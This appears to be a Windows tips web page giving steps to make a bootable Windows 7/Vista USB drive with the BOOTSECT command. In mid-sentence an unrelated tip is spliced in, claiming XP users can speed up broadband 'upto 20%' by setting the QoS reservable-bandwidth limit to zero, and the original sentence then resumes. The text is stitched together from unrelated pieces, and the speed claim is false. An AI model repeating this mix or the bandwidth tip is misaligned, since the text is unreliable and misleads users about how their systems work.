5. Next insert your Windows7/Vista DVD into the optical drive and check the drive letter of the DVD drive. In this guide I will assume that your DVD drive letter is D and USB drive letter is H (open my computer to know about it). 6. Maximize the minimized Command Prompt in the 4th step.Type the following command now: D: CD BOOT and hit enter.Where D is your DVD drive letter. CD BOOT and hit enter to see the below message. 7. Type another command given below to update the USB drive with BOOTMGR compatible code. BOOTSECT.EXE /NT60 H:

Where H is your USB drive letter. Once you enter the above command you will see the below message. 8. Copy your Windows 7/Vista DVD contents to the USB flash drive. 9. Your USB drive is ready to boot and install Windows 7/Vista. Only thing you need to change the boot priority at the BIOS to USB from the HDD or CD ROM drive. I wont explain it as its just the matter the changing the boot priority or enabling the USB boot option in the BIOS. Note: If you are not able to boot after following this guide means you havent set the BIOS priority to USB. If you got any problem in following this guide feel free to ask questions by leaving comment. Update: If you find this guide difficult to follow, please use the easy-to-use guide to 26) If you are using a BroadBand connection at your home and using Windows Xp as your Operating System, and you feel that your BroadBand speed is a bit less, then in that case you have the option to increase your Broadband speed upto 20%. 1. First of all make sure you are logged in as Administrator. 2. Go to Start -> Run -> gpedit.msc , Press OK. 3. Then go to Computer Configuration -> Administrative Templates -> Network -> QOS packet Scheduler. 4. On the right it will give you the option of Limit Reservable bandwidth, open and and select Enabled, and change the value from 20 to O. a bootable USB to install Windows 7 using official tool.

You might also like